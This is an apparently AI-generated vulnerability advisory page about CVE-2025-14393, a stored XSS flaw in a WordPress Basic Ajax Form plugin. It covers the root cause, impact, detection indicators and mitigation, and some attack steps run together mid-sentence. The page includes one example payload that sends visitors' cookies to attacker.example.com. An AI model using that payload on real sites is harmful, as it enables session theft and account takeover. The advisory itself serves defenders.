
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14393 is a Stored Cross-Site Scripting (XSS) vulnerability in the Wpik WordPress Basic Ajax Form plugin for WordPress. It affects all versions up to and including 1.0, caused by insufficient input sanitization and output escaping of the dname parameter. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages that execute for any user who visits the affected page. The vulnerability was published on December 12, 2025, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. The vulnerable code resides in the plugin's index.php file (lines 84, 85, and 107), where the dname parameter is accepted from user input and rendered in page output without proper sanitization or escaping (Wordfence, Plugin Source). An attacker with at least Contributor-level WordPress access submits a malicious payload via the dname parameter, which is then persistently stored and later rendered in the browser of any visitor to the injected page. No user interaction beyond page visitation is required for the payload to execute, and the scope is changed — meaning the injected script can affect users beyond the attacker's own session.
Successful exploitation allows injected scripts to execute in the browsers of all users who visit the compromised page, enabling session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims, and potential account takeover — including administrator accounts if an admin visits the page. The persistent (stored) nature of the attack means the payload remains active until removed, maximizing the number of affected users. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected (Wordfence, Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14393 as of the available data. The EPSS score is approximately 0.036%, indicating a low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a Contributor-level WordPress account, which limits the attack surface compared to unauthenticated vulnerabilities, though it remains a realistic threat on sites with open contributor registration.
dname parameter, e.g., <script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>.dname parameter value containing the malicious script, causing it to be stored in the database.wp-admin/admin-ajax.php) with unusual or encoded values in the dname parameter; entries containing HTML tags or JavaScript keywords (<script>, onerror, javascript:) in form submission logs.index.php) for unauthorized modifications that may have introduced additional backdoors.As of the disclosure date (December 12, 2025), no patched version of the Wpik WordPress Basic Ajax Form plugin has been released — all versions up to and including 1.0 are affected (Wordfence). The recommended immediate action is to deactivate and remove the plugin until a patched version is available. Site administrators should also restrict Contributor-level registrations if not required, and deploy a Web Application Firewall (WAF) capable of detecting XSS payloads as a compensating control. Monitor the WordPress plugin repository and Wordfence advisories for patch availability.
Wordfence identified and disclosed the vulnerability as part of their weekly WordPress vulnerability report for December 8–14, 2025, assigning it a CVSS score of 6.4 (Medium) (Wordfence Weekly Report). Red Hat also tracked the CVE in their security advisory database (Red Hat CVE). No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation was observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."